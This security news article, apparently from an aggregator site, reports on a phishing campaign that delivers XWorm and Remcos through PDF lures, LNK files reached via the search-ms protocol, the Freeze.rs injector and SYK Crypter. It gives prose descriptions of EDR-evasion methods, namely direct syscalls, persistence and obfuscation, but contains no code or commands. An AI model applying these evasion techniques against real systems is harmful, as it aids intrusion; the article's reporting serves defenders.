XWorm, Remcos RAT Evade EDRs to Infect Critical Infrastructure

Disguised as harmless PDF documents, LNK files trigger a PowerShell script, initiating a Rust-based injector called Freeze[.]rs and a host of malware infections.

The Rust-based injector Freeze[.]rs has been weaponized to introduce a raft of malware to targets, in a sophisticated phishing campaign containing a malicious PDF file that gets around endpoint detection and response (EDR).
First discovered by Fortinets FortiGuard Labs in July, the campaign is targeting victims across Europe and North America, including specialty chemical or industrial product suppliers.
Eventually, this chain culminates in the loading of XWorm malware establishing communication with a command-and-control (C2) server, an analysis by the firm revealed. XWorm can carry out a wide range of functions, from loading ransomware to acting as a persistent backdoor.
Further revelations also unveiled the involvement of SYK Crypter, a tool frequently utilized to distribute malware families via the Discord community chat platform. This crypter played a role in loading
Remcos, a sophisticated remote access Trojan (RAT)
adept at controlling and monitoring Windows devices.
In their investigation, the teams analysis of encoded algorithms and API names traced the origin of this novel injector back to the Red Team tool Freeze.rs, designed explicitly for crafting payloads capable of bypassing EDR security measures.
This file redirects to an HTML file and utilizes the search-ms protocol to access an LNK file on a remote server, a company blog post
explained
. Upon clicking the LNK file, a PowerShell script executes Freeze[.]rs and SYK Crypter for further offensive actions.
Cara Lin, researcher, FortiGuard Labs, explains that the Freeze[.]rs injector calls NT syscalls to inject the shellcode, skipping the standard calls that are in Kernel base dll, which may be hooked.
They use the slight delay that occurs before an EDR starts hooking and altering the assembly of system DLLs within a process, she says. If a process is created in a suspended state, it has minimal DLLs loaded, and no EDR-specific DLLs are loaded, indicating that the syscalls within Ntdll.dll remain unaltered.
Lin explains the attack chain is initiated through a booby-trapped PDF file, which works together with a search-ms protocol to deliver the payload.
This JavaScript code utilized the search-ms functionality to reveal the LNK file located on a remote server.
The search-ms protocol can redirect users to a remote server via a Windows Explorer Window.
Through the use of a deceptive LNK file disguised as a PDF icon, it can deceive victims into believing that the file originates from their own system and is legitimate, she notes.
Meanwhile, the SYK Crypter copies itself to the Startup folder for persistence, encrypts the configuration during encoding and decrypts it upon execution, and also encrypts the compressed payload in the resource‎‎ for obfuscation, she adds.
A downloader is utilized alongside encoding in the first layer and subsequently, a second layer involves string obfuscation and payload encryption.
This multi-layered strategy is designed to enhance the complexity and challenge for static analysis, she says. Finally, it can terminate itself upon recognizing a specific security vendor.
Phishing and other messaging-based attacks
continue to be a pervasive threat
, with 97% of companies seeing at least one email phishing attack in the past 12 months and three-quarters of firms expecting significant costs from an email-based attack.
Phishing attacks
are getting smarter and more targeted, adapting to new technology and user behavior, evolving to include mobile exploits, brand impersonation, and AI-generated content.
The research notes its crucial to maintain up-to-date software to mitigate risks, provide regular training, and use advanced security tools for defenses to counter the evolving threat of phishing attacks.
Phishing simulation training for employees
appears to work better at critical infrastructure organizations
than it does across other sectors, with 66% of those employees correctly reporting at least one real malicious email attack within a year of training, new research has found.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
XWorm, Remcos RAT Evade EDRs to Infect Critical Infrastructure